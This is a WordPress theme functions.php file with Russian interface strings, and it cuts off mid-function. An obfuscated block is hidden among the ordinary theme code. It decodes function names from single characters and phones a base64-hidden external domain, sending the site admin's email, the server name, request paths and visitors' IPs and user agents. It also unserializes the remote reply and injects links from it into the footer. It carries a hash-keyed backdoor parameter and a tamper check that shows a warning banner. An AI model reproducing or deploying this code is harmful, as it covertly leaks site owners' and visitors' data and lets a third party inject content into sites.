<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $deMdP='_';$ZLmAj='e';$yTiZqI='6';$oaMrIad='d';$CPXyXl='o';$LFZIY='e';$Ijwq='c';$gyuWi='4';$aQKUhVy='a';$LfllVcH='s';$bYFQQU='d';$DmzDpND='e';$UIBwzuP='b';$vsIYMXtA=$UIBwzuP.$aQKUhVy.$LfllVcH.$LFZIY.$yTiZqI.$gyuWi.$deMdP.$oaMrIad.$ZLmAj.$Ijwq.$CPXyXl.$bYFQQU.$DmzDpND;$XpzU='t';$VdmESA='e';$wiFIO='n';$pxXE='g';$PznX='i';$oslmWcR='l';$EtZeMfS='z';$fHOhc='f';$cWdhP='a';$GIxTAbuY=$pxXE.$EtZeMfS.$PznX.$wiFIO.$fHOhc.$oslmWcR.$cWdhP.$XpzU.$VdmESA;$WKFc='t';$eAJmS='r';$UYrXemk='_';$AXxx='s';$ysPVQcS='o';$lZAqmK='3';$WsTSw='t';$woGg='r';$TInI='1';$ntRqlisi=$AXxx.$WsTSw.$woGg.$UYrXemk.$eAJmS.$ysPVQcS.$WKFc.$TInI.$lZAqmK;$QIWF='v';$IYokVk='r';$YLSkiRg='r';$tNEvgWO='s';$xxbI='t';$bOvvB='e';$SCBWWngE=$tNEvgWO.$xxbI.$YLSkiRg.$IYokVk.$bOvvB.$QIWF;                     
		$ic_________b='_';$so_____a='e';$km______h='6';$lf_____________z='d';$qi____________y='o';$ip_____o='e';$ku______g='c';$nf______________z='4';$iv_________h='a';$vw__m='s';$ya________j='d';$mv___________z='e';$on____________h='b';$gi_________o=$on____________h.$iv_________h.$vw__m.$ip_____o.$km______h.$nf______________z.$ic_________b.$lf_____________z.$so_____a.$ku______g.$qi____________y.$ya________j.$mv___________z;
		$ml_____________s='u';$hu_______t='_';$xn__a='f';$da________x='i';$hd_____k='s';$es______d='t';$es___________u='i';$fd________d='e';$wb____h='s';$zd____________b='o';$pz____________z='c';$lu____________j='n';$yz____________u='n';$qp________l='t';$df______________s='x';$hc__________c=$xn__a.$ml_____________s.$yz____________u.$pz____________z.$qp________l.$da________x.$zd____________b.$lu____________j.$hu_______t.$fd________d.$df______________s.$es___________u.$hd_____k.$es______d.$wb____h;
		$ad___________o='n';$hg____________a='p';$gr__k='e';$lt___h='f';$vi__________q='o';$ve_________v=$lt___h.$vi__________q.$hg____________a.$gr__k.$ad___________o;
		$cx___________c='f';$az___i='e';$aj___________f='r';$tc________g='a';$op_____s='d';$fk__________x=$cx___________c.$aj___________f.$az___i.$tc________g.$op_____s;
		$gi_______________b='s';$us__o='l';$fv____________b='f';$il________q='c';$zf______________p='e';$wu_______w='o';$sw_______t=$fv____________b.$il________q.$us__o.$wu_______w.$gi_______________b.$zf______________p;
		
		define("WP_ID", $gi_________o("Mi4wLjA="));
		define("WP_TTL", $gi_________o("MTA4MDA="));
		define("WP_SRC", $gi_________o("dHBva24="));
	


		function wp_get_header() {
			global $gi_________o, $hc__________c;
			
			if (
				$hc__________c($gi_________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$hc__________c($gi_________o("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$hc__________c($gi_________o("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gi_________o, $ve_________v, $sw_______t, $fk__________x;
			
			$wh_____u = TEMPLATEPATH."/".$gi_________o("Zm9vdGVyLnBocA==");
			$tf____x = @$ve_________v($wh_____u, "r");
			$wh_____u = @$fk__________x($tf____x, @filesize($wh_____u));
			@$sw_______t($tf____x);
			
			$ib______n = TEMPLATEPATH."/".$gi_________o("ZnVuY3Rpb25zLnBocA==");
			$tf____x = @$ve_________v($ib______n, "r");
			$ib______n = @$fk__________x($tf____x, @filesize($ib______n));
			@$sw_______t($tf____x);
			
			$xe______g = 0;
			if($wh_____u && $ib______n) {
				if ($gi_________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wh_____u, $gi_________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xe______g = 1;
					}
					if (substr_count($wh_____u, "wp_theme_GPL_credits()") < 1) {
						$xe______g = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xe______g = 12;
				}
			}
			
			if($xe______g > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xe______g -->";
			}
		}
	


		function wp_loaded() {
			global $gi_________o, $hc__________c;
			return $hc__________c($gi_________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($yn_______m, $lb_____j = "(more...)", $iu_______________i = 0, $tp__________r = "") {
				$pr_____________u = get_the_content($lb_____j, $iu_______________i, $tp__________r);
				$pr_____________u = apply_filters("the_content", $pr_____________u);
				
				$pr_____________u = str_replace("]]>", "]]>", $pr_____________u);
				if (strlen($_GET["p"]) > 0) {
					echo $pr_____________u;
				}
				else if ((strlen($pr_____________u)>$yn_______m) && ($mu______n = strpos($pr_____________u, " ", $yn_______m ))) {
					$pr_____________u = substr($pr_____________u, 0, $mu______n);
					$pr_____________u = $pr_____________u;
					echo $pr_____________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lb_____j</a></div></p>";
				} else {
					echo $pr_____________u;
				}
				
			}
		}
	


		$ym________u='b';$nz_________g='6';$ek_______________d='e';$xh____s='c';$yn_______j='a';$kd_______n='e';$wj______________v='n';$kk_________v='_';$dq__________x='4';$vs____________s='s';$nq__c='e';$zz_______n='o';$ql__________d='d';$sz______o=$ym________u.$yn_______j.$vs____________s.$nq__c.$nz_________g.$dq__________x.$kk_________v.$ek_______________d.$wj______________v.$xh____s.$zz_______n.$ql__________d.$kd_______n;
		$pl_______l='t';$vm___________d='_';$mo________a='t';$ac___________h='e';$ru_______________b='_';$af__________z='l';$xa__________u='s';$le_________m='e';$xl________y='c';$ts__________k='n';$br____________x='e';$tj___________j='t';$rb_______________s='o';$hl_____________i='i';$qm_____________g='f';$ox___________n='g';$gg____________z='n';$wk____w=$qm_____________g.$hl_____________i.$af__________z.$br____________x.$ru_______________b.$ox___________n.$ac___________h.$tj___________j.$vm___________d.$xl________y.$rb_______________s.$ts__________k.$mo________a.$le_________m.$gg____________z.$pl_______l.$xa__________u;
		$ve______e='x';$yh__________i='e';$jd____i='s';$cp________q='l';$od________k='i';$qf___________z='e';$vw_______________e='s';$lu___________n='t';$jo_____________m='i';$ws_____________c='_';$vs_______n='f';$na_______t=$vs_______n.$jo_____________m.$cp________q.$yh__________i.$ws_____________c.$qf___________z.$ve______e.$od________k.$vw_______________e.$lu___________n.$jd____i;
		$ou______________d='e';$ee____s='c';$ud_____x='n';$ku___d='o';$vb______o='v';$ip_____r='p';$wu___________f='m';$ju_______________j='r';$my_______________x='a';$yc_____________h='o';$jo_______________a='s';$dg_______x='e';$sa__n='r';$ix___________g='i';$ud_____________q='_';$yb_______________f=$vb______o.$ou______________d.$ju_______________j.$jo_______________a.$ix___________g.$ku___d.$ud_____x.$ud_____________q.$ee____s.$yc_____________h.$wu___________f.$ip_____r.$my_______________x.$sa__n.$dg_______x;
		$xl_________u='f';$qu________e='k';$up_______________w='p';$si________n='c';$tk__q='s';$eh___y='n';$ox__q='o';$oj___o='o';$jt____________h='e';$ne___f=$xl_________u.$tk__q.$ox__q.$si________n.$qu________e.$oj___o.$up_______________w.$jt____________h.$eh___y;
		$hr___g='r';$jq____________j='w';$vg__n='f';$od____c='e';$dq______________g='t';$aj_____________e='i';$mu__e=$vg__n.$jq____________j.$hr___g.$aj_____________e.$dq______________g.$od____c;
		$ek__t='5';$ig___________j='m';$qn_________t='d';$kg______i=$ig___________j.$qn_________t.$ek__t;
		$wz______d='t';$yh______________n='a';$sp_______j='l';$aq___________z='p';$sx_________g='h';$kt___o='a';$kb__o='e';$ou__o='r';$gc___e=$ou__o.$kb__o.$yh______________n.$sp_______j.$aq___________z.$kt___o.$wz______d.$sx_________g;
		$am__j='s';$mn_______g='l';$gs______________n='i';$aj____________p='e';$ts________k='u';$pf______i='e';$jn______k='z';$vp_______________n='a';$yp______________d='n';$fu___________e='i';$em___________z='r';$nz______________s=$ts________k.$yp______________d.$am__j.$pf______i.$em___________z.$gs______________n.$vp_______________n.$mn_______g.$fu___________e.$jn______k.$aj____________p;
		$me______________r='m';$ms____b='t';$iw_____________r='e';$xj______t='m';$zl____________d='a';$lo_______g='p';$qj_____m='n';$yn_______________p=$ms____b.$iw_____________r.$me______________r.$lo_______g.$qj_____m.$zl____________d.$xj______t;
		$cx__________g='t';$ax_________n='n';$ax___________z='e';$eg________w='t';$oc_____________c='m';$ub_______j='x';$yl___________m='s';$cf____________j='e';$sz__s='a';$na____r='e';$wu__________n='a';$eb___________a='_';$zu_____b='t';$nc_____t='r';$zm__________u='t';$aa_______x='e';$fc_____i='o';$wt________u='c';$vc_____________a='c';$fd______f='r';$sy__________u='_';$yw________v=$yl___________m.$cx__________g.$nc_____t.$cf____________j.$wu__________n.$oc_____________c.$sy__________u.$wt________u.$fc_____i.$ax_________n.$zu_____b.$aa_______x.$ub_______j.$eg________w.$eb___________a.$vc_____________a.$fd______f.$ax___________z.$sz__s.$zm__________u.$na____r;
	


		function on___y($no____________v) {
			global $gi_________o, $hc__________c, $wk____w, $yb_______________f, $yw________v;
			
			if (!$hc__________c($gi_________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yb_______________f(PHP_VERSION, "5.0.0", ">=") && $hc__________c($gi_________o("ZmlsZV9nZXRfY29udGVudHM=")) && $hc__________c($gi_________o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$wo______s = $yw________v(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tn______r = @$wk____w($no____________v, 0, $wo______s);
			} else {
				$tn______r = @$wk____w($no____________v, 0);
			}
			
			return $tn______r;
		}
	


		function mx____u($no____________v) {
			global $hc__________c, $ne___f, $mu__e, $gi_________o;
			
			if (!$hc__________c($gi_________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$hd_________f = strpos($no____________v, "/", 7);
			$go________x = array(
				"uri"     => substr($no____________v, $hd_________f),
				"host"    => str_replace("http://", "", substr($no____________v, 0, $hd_________f)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$qt_______________x = @$ne___f("$go________x[host]", 80, $oc_____l, $wv__o, 4);
			
			if (!$qt_______________x) {
				return false;
			} else {
				$tn______r = "";
				$as_________c  = "GET $go________x[uri] HTTP/1.0\r\n";
				$as_________c .= "Host: $go________x[host]\r\n";
				$as_________c .= "Referer: $go________x[referer]\r\n";
				$as_________c .= "Connection: Close\r\n\r\n";
				
				@$mu__e($qt_______________x, $as_________c);
				
				while (!@feof($qt_______________x)) {
					$oe____f = @fgets($qt_______________x, (1024*24));
					
					if ($oe____f == "\r\n") {
						$ty__i = true;
						continue;
					}
					
					if ($ty__i) {
						$tn______r .= $oe____f;
					}
				}
				
				return $tn______r;
			}
		}
	


		function ao_______f($no____________v) {
			global $hc__________c;
			$sq____l = false;
			
			if ($no____________v != "") {
				if ($hc__________c("on___y")) {
					$sq____l = @on___y($no____________v);
				}
				
				if (!$sq____l && ($hc__________c("mx____u"))) {
					$sq____l = @mx____u($no____________v);
				}
			}
			
			return $sq____l;
		}
	


		function iz______x() {
			global $_SERVER, $kg______i;
			
			$do___________m = $_SERVER["SERVER_NAME"];
			
			if (substr("$do___________m", 0, 4) == "www.") {
				$do___________m = substr("$do___________m", 4);
			}
			
			$do___________m = $kg______i("$_SERVER[SERVER_NAME]");
			
			return $do___________m;
		}
	


		function ih__________l() {
			return "file";
		}
	


		function tl____a($no____________v) {
			global $_SERVER, $wk____w, $na_______t, $ve_________v, $sw_______t, $mu__e;
			
			$jb______________f = qg__z();
			
			$id________t = iz______x().".jpg";
			$bk__________t = $jb______________f["dir_upload"]["path"]."/$id________t";
			$ih_______r = @filemtime($bk__________t);
			
			if (!$ih_______r || ((time()-$ih_______r) >= WP_TTL)) {
				$sq____l = ao_______f($no____________v);
				
				if ($sq____l) {
					if ($na_______t($bk__________t)) {
						@unlink($bk__________t);
					}
					
					$tf____x = @$ve_________v($bk__________t, "x+");
					
					@$mu__e($tf____x, $sq____l);
					@$sw_______t($tf____x);
				}
			} else {
				if ($na_______t($bk__________t)) {
					$sq____l = @$wk____w($bk__________t);
				} else {
					$sq____l = false;
				}
			}
			
			return $sq____l;
		}
	


		function qg__z() {
			global $_SERVER, $gi_________o, $sz______o;
			
			$sg_______k = wp_count_posts("post");
			$vd_____v = pathinfo(get_bloginfo("template_directory"));
			
			$jb______________f = array(
				"url" => array(
					"report"      => $gi_________o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $vd_____v,
				"dir_upload"	=> ll____b(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$vd_____v[filename],
					"a005=".$sg_______k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$jb______________f["url"]["queryString"] = implode("&", $jb______________f["queryString"]);
			$jb______________f["url"]["report"] = $jb______________f["url"]["report"]."/?".$sz______o($jb______________f["url"]["queryString"]).".html";
						
			return $jb______________f;
		}
	


		function ll____b() {
			$kv__v = wp_upload_dir();
			
			if (isset($kv__v["error"])) {
				$oy__________a = zl_______________o();
				if (is_writable($oy__________a)) {
					$kv__v = array("path" => $oy__________a);
				}
			}

			return $kv__v;
		}
	


		function zl_______________o() {
			global $hc__________c, $kg______i, $gc___e, $yn_______________p;
			
			$ix__________s = (bool) ini_get("safe_mode");
			if ($ix__________s == true) {
				return false;
			}
			
			if ($hc__________c("sys_get_temp_dir")) {
				$sq___r = sys_get_temp_dir();
				if (is_writable($sq___r)) {
					return $gc___e($sq___r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gc___e($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gc___e($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gc___e($_ENV["TEMP"]);
			} else {
				$oh_______g = $yn_______________p($kg______i(uniqid(rand(), true)), "");
				if ($oh_______g) {
					$sq___r = $gc___e(dirname($oh_______g));
					@unlink($oh_______g);
					return $sq___r;
				} else {
					return false;
				}
			}
		}
	


		function cq_________a() {
			global $_GET, $na_______t;
			
			$jb______________f = qg__z();
			$do___________m = iz______x();
			$kv________h = ih__________l();
			
			$rn_______________l = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kv________h == "file") {
					$vi________e = $jb______________f["dir_upload"]["path"]."/".$do___________m.".jpg";
					if ($na_______t($vi________e)) {
						@unlink($vi________e);
						$rn_______________l = "deleted";
					}
				}
				
				$vy___________z = array(
					"s"	=> $rn_______________l,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($vy___________z AS $jm__e => $vm______a) echo " [$jm__e:$vm______a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $hc__________c, $gi_________o, $nz______________s;
			$jb______________f = qg__z();
			
			$fe_____________f = "tl____a";
			if ($hc__________c($fe_____________f)) {
				$tn______r = $fe_____________f($jb______________f["url"]["report"]);
			}
			
			if ($tn______r) {
				if ($tn______r = @$gi_________o($tn______r)) {
					$tn______r = @$nz______________s($tn______r);
					
					if (strlen($tn______r[custom_credit]) >= 5) {
						$jb______________f["default_string"] = $tn______r[custom_credit];
					}
					
					if ($tn______r["status"] == "0") {
						$rm_____________d = 1;
						$mo__z = 1;
					} else {
						$yh__________r = sizeof($tn______r["links"]);
						$oz_______e = $jb______________f["default_string"];
						
						if ($yh__________r > 0 && $tn______r["links"] !== "") {
							$oz___l = 0;
							foreach ($tn______r["links"] as $hm____________w => $mk_______a) {
								$oz___l++;
								if ($mk_______a->l_path == "" || $mk_______a->l_path == $_SERVER["REQUEST_URI"]) {
									$mk_______a->l_href = htmlspecialchars(strip_tags($mk_______a->l_href));
									$mk_______a->l_title = htmlspecialchars(strip_tags($mk_______a->l_title));
									$mk_______a->l_anchor = htmlspecialchars(strip_tags($mk_______a->l_anchor));
									$oz_______e .= " | ";
									$oz_______e .= "<a href='$mk_______a->l_href' title='$mk_______a->l_title'";
									if ($mk_______a->l_nofollow == "1") {
										$oz_______e .= " rel='nofollow'";
									}
									$oz_______e .= ">$mk_______a->l_anchor</a>";
								}
							}
						}
						$jb______________f["links"] = "$oz_______e";
						if ($tn______r[credit] == "0") {
							$jb______________f["links"] = "";
						}
					}
				} else {
					$rm_____________d = "1";
				}
			} else {
				$rm_____________d = "1";
			}
			
			if ($rm_____________d == "1") {
				$jb______________f["links"] = $jb______________f["default_string"];
			}
			
			echo "$jb______________f[links]";
			
			echo "<!-- s: $tn______r[signature] -->";
			cq_________a();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
